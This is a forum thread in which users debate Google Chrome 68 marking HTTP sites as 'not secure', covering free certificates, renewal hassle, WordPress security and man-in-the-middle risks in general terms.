Google Chrome Release 68 to Start Labeling HTTP Websites as Not Secure

cageymaru

Fully [H]
Joined
Apr 10, 2003
Messages
22,060
Google Chrome Release 68 will begin labeling HTTP websites as not secure. Google has been pushing for websites to switch to HTTPS for about a year, and now their day of reckoning is at hand. The update is scheduled to roll out tomorrow.

Unencrypted sites to show "not secure" indicator
For the past several years, we've advocated that sites adopt HTTPS encryption for greater security. Within the last year, we've also helped users by marking a larger subset of HTTP pages as "not secure". Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as "not secure"
 
I have a small, basic html, non-interactive web site that I made a few years ago for my company. Will my site and similar super basic sites be labeled insecure too?
 
This is not necessary. Doesn't the encryption have an increase in bandwidth use? Kim Kardashian's photos do not need a secure connection.
 
It's a false sense of security.

HTTPS ≠ Secure

With as easy as it is for pretty much anyone to get a certificate this is just pushing a false sense of security to the people who don't know any better. It's also another hoop for businesses running Chrome and intranet sites. Inevitably you'll get that worker who asks "WHY DOES CHROME SAY OUR INTRANET PAGE IS INSECURE?!" along with 50 other questions.
 
I have a small, basic html, non-interactive web site that I made a few years ago for my company. Will my site and similar super basic sites be labeled insecure too?

Yup. Which technically it is. But that might not be an issue.

Certs have been free for ages. No reason not to be running SSL in current year.

Where can you get real signed certs for free? Self signed don’t count.
 
I just hope they leave it to the browser bar and don't turn on the block page (the one that blocks the site and makes you click "Advanced > Let me anyways"), that will be annoying.


Yup. Which technically it is. But that might not be an issue.



Where can you get real signed certs for free? Self signed don’t count.

https://letsencrypt.org/
 
Certs have been free for ages. No reason not to be running SSL in current year.

Except for the fact that not all websites need to be encrypted. You should never have to get permission from a third party to pop up a website. Google is going from misguided to outright harmful by pushing too far on this issue.
 
It is for reasons like this that I have multiple browsers installed on every computer I use, including my phone.
 
I have a small, basic html, non-interactive web site that I made a few years ago for my company. Will my site and similar super basic sites be labeled insecure too?

Just need to have more confidence and ignore the haters.
 
It is for reasons like this that I have multiple browsers installed on every computer I use, including my phone.
So you're spending so much time looking at the top left of your browser adress bar that you will start to use other browsers for websites not running SSL? :p
 
.
Except for the fact that not all websites need to be encrypted.
I believe the idea behind it is http is plaintext sent over the intertubes, anyone can mitm it and insert malicious... software?
 
.
I believe the idea behind it is http is plaintext sent over the intertubes, anyone can mitm it and insert malicious... software?

As stated above, https doesn't fully stop that. If you use wordpress you are gong to have a platform made out of swiss cheese that anyone can load malicious software into your site for you. You can still get bad adds. Your server itself can still be hijacked. You still have some possible SSL man in the middle attack methods out there.
 
I never said it did, I'm still pissy about marking self-signed ones as insecure.
 
So much this... There simply are no more valid excuses left at this point.

Except, having to renew your certs every 90 days is a pain in the arse. I have cron jobs running on my own servers that automate it for me, but a few are hosted elsewhere and I have to (SHOCK HORROR) pick up the phone to get some monkey to do it for me.
 
.
I believe the idea behind it is http is plaintext sent over the intertubes, anyone can mitm it and insert malicious... software?

It's not about the SSL encryption per se. SSL is a requirement for all of the other browser security stuff like same-origin policy restrictions and so on. By enforcing SSL, all the other stuff that enables better security gets enabled.
 
So you're spending so much time looking at the top left of your browser adress bar that you will start to use other browsers for websites not running SSL? :p

Looking at your own stuff is one thing, hosting a web presence for paying customers who are concerned about security is another.
 
It's a false sense of security.

HTTPS ≠ Secure

With as easy as it is for pretty much anyone to get a certificate this is just pushing a false sense of security to the people who don't know any better. It's also another hoop for businesses running Chrome and intranet sites. Inevitably you'll get that worker who asks "WHY DOES CHROME SAY OUR INTRANET PAGE IS INSECURE?!" along with 50 other questions.
The only people this helps are Google and others stripping you anonymity away. And people who whore coffee shop Wi-Fi, or steal Wi-Fi from neighbors. Gives them minor protection from amateur man in the middle attacks and taps.
 
I have a small, basic html, non-interactive web site that I made a few years ago for my company. Will my site and similar super basic sites be labeled insecure too?
If you're not carrying ads or data mining your users, what use does google have for you?
 
Anyone who thinks HTTPS = complete security will soon join the ranks of victims. It is merely one check box on a long list of steps for security. Lack of HTTPS on a website should be a warning flag to ask 'what other steps have they skipped?'. Especially if they are an commerce site or storing/collecting customer information.

As others have noted, not all websites really need HTTPS. If all your website is doing is serving up basic text and/or images and is otherwise secured behind a proper firewall on a hardened server with all appropriate updates applied, probably don't need the extra hassle of HTTPS.
 
There a ton of HTTPS sites that aren't "secure" also.

yeah id like to see them add a list of known sites that have been hacked recently.. and when you visit them, a big warning pops-up.. recently hacked.. use at your own peril.. type of notice.

now that would be fun
 
Depending on configuration, you could also run into users of a site who don't accept your cert issuer as a trusted root certifier, aren't getting the right intermediate certs, etc. Hardly seems worth the effort if you aren't delivering content which actually requires it.
 
As stated above, https doesn't fully stop that. If you use wordpress you are gong to have a platform made out of swiss cheese that anyone can load malicious software into your site for you. You can still get bad adds. Your server itself can still be hijacked. You still have some possible SSL man in the middle attack methods out there.

Yes, it's easy to deploy a poorly configured WP server that is an insecure piece of shit, just like with anything else. But you can also deploy a well secured server as well, as long as you watch which addons you use and server config settings. So just running WP doesn't open you up to those vulnerabilities by default.

And last I checked there are no known SSL MITM exploits that can be done without alerting the user and requiring them to click ok or getting your proxy cert trusted on their machine. Good for chrome doing this, as SSL should be required on ALL sites by now. With the GOP allowing ISPs to scrape/sell our data, any additional security that prevents that is a good thing. Certs are cheap, easy to obtain/deploy (letsencrypt), and do not cause a performance drop with the current CPUs. But once ISPs can no longer scrape our data, I'm 100% sure they will push for legislation that requires all users to install their proxy cert so they can open up the tunnel and scan traffic because 'turrorists! and save the children'.... You know, the typical bullshit.
 
So you're spending so much time looking at the top left of your browser adress bar that you will start to use other browsers for websites not running SSL? :p

When one browser refuses to open a page, tries to tell me I don't know what I'm doing, or otherwise fails to function properly then I just switch until I find one that works. I'm all about saving time. It is way faster to just switch browsers than to try dealing with adding exceptions, finding the right plugin, etc.

This change may be warranted for the unwashed masses. Those who are competent and experienced with browsing should have a way to opt-out. The same applies to Chrome's "Disable developer mode extensions" nag that annoyingly pops up every time I open Chrome. Google, get your shit together. I'm a developer, I deliberately enabled that. Don't nag me to turn it off, it makes me use a different browser.
 
Except, having to renew your certs every 90 days is a pain in the arse. I have cron jobs running on my own servers that automate it for me, but a few are hosted elsewhere and I have to (SHOCK HORROR) pick up the phone to get some monkey to do it for me.

I got the impression from that site that it had a small time frame in which you needed to renew since it was saying that it did not recommend that you use it in any way that wasn't you installing some software on the server directly and allowing it to download and replace your certs for you otherwise you would be doing it often on your own. For an intergraded system that would be a nightmare. Personally I will stick to paying for them and have a few years before I have to worry about replacing them, otherwise I would be hiring another person just to keep certs up to date which then offsets to "free" part of them.

Yes, it's easy to deploy a poorly configured WP server that is an insecure piece of shit, just like with anything else. But you can also deploy a well secured server as well, as long as you watch which addons you use and server config settings. So just running WP doesn't open you up to those vulnerabilities by default.

And last I checked there are no known SSL MITM exploits that can be done without alerting the user and requiring them to click ok or getting your proxy cert trusted on their machine. Good for chrome doing this, as SSL should be required on ALL sites by now. With the GOP allowing ISPs to scrape/sell our data, any additional security that prevents that is a good thing. Certs are cheap, easy to obtain/deploy (letsencrypt), and do not cause a performance drop with the current CPUs. But once ISPs can no longer scrape our data, I'm 100% sure they will push for legislation that requires all users to install their proxy cert so they can open up the tunnel and scan traffic because 'turrorists! and save the children'.... You know, the typical bullshit.

I haven't used wordpress in awhile so they have fixed the default vulnerabilities then? For awhile there yes certain plugins made it easier, but there were still many in the base system. Had somebody at work running just the base load and have trouble a few times so one of our developers made a bunch of changes to the base code to lock it down better, then told the person to just never install any updates as that would replace all his work.

As for SSL MITM exploits. I seem to recall hearing about a few in the recent past. Didn't heartbleed allow private keys to be stolen? Not saying that it is wide spread, but there does seem to be cases every now and then that pop up for some SSL mitm trouble.
 
I got the impression from that site that it had a small time frame in which you needed to renew since it was saying that it did not recommend that you use it in any way that wasn't you installing some software on the server directly and allowing it to download and replace your certs for you otherwise you would be doing it often on your own. For an intergraded system that would be a nightmare. Personally I will stick to paying for them and have a few years before I have to worry about replacing them, otherwise I would be hiring another person just to keep certs up to date which then offsets to "free" part of them.



I haven't used wordpress in awhile so they have fixed the default vulnerabilities then? For awhile there yes certain plugins made it easier, but there were still many in the base system. Had somebody at work running just the base load and have trouble a few times so one of our developers made a bunch of changes to the base code to lock it down better, then told the person to just never install any updates as that would replace all his work.

As for SSL MITM exploits. I seem to recall hearing about a few in the recent past. Didn't heartbleed allow private keys to be stolen? Not saying that it is wide spread, but there does seem to be cases every now and then that pop up for some SSL mitm trouble.


Yes, it does take some work to secure it, but I don't think there are that many exploits still in the base code. I think it has more to do with the server setup/config, but I'm not part of the team actually working on the site. We have done external pen testing against it to confirm as well.

Yes, heartblead was a server exploit that could have leaked the private SSL keys, but that's not an exploit/vulnerability in SSL itself. Can't leave a key under your door mat then say locks are insecure if someone gains access to your house.
 
Yes, it does take some work to secure it, but I don't think there are that many exploits still in the base code. I think it has more to do with the server setup/config, but I'm not part of the team actually working on the site. We have done external pen testing against it to confirm as well.

Yes, heartblead was a server exploit that could have leaked the private SSL keys, but that's not an exploit/vulnerability in SSL itself. Can't leave a key under your door mat then say locks are insecure if someone gains access to your house.

I didn't mean to imply that SSL itself was the flaw, just that putting a cert on a server doesn't not mean that there is 100% promise that your data will never be seen by anyone. There is still a way possible for a man in the middle attack to happen. Just like locking your door doesn't mean there is 100% chance that your house won't be broken into. It is still more secure than not locking it, but doesn't mean that you are 100% safe from a bad action occurring.
 
When one browser refuses to open a page, tries to tell me I don't know what I'm doing, or otherwise fails to function properly then I just switch until I find one that works. I'm all about saving time. It is way faster to just switch browsers than to try dealing with adding exceptions, finding the right plugin, etc.

This change may be warranted for the unwashed masses. Those who are competent and experienced with browsing should have a way to opt-out. The same applies to Chrome's "Disable developer mode extensions" nag that annoyingly pops up every time I open Chrome. Google, get your shit together. I'm a developer, I deliberately enabled that. Don't nag me to turn it off, it makes me use a different browser.
But, it doesn't refuse to open the page... It doesn't sound like you understand what it is you're complaining about.
 
Looking at your own stuff is one thing, hosting a web presence for paying customers who are concerned about security is another.
Yeah, I know. I used to work with webdev and hosting... we set our servers up to run openssl years ago. Charge customers to maintain the certificates and services that run it. Fixed.
 
Back
Top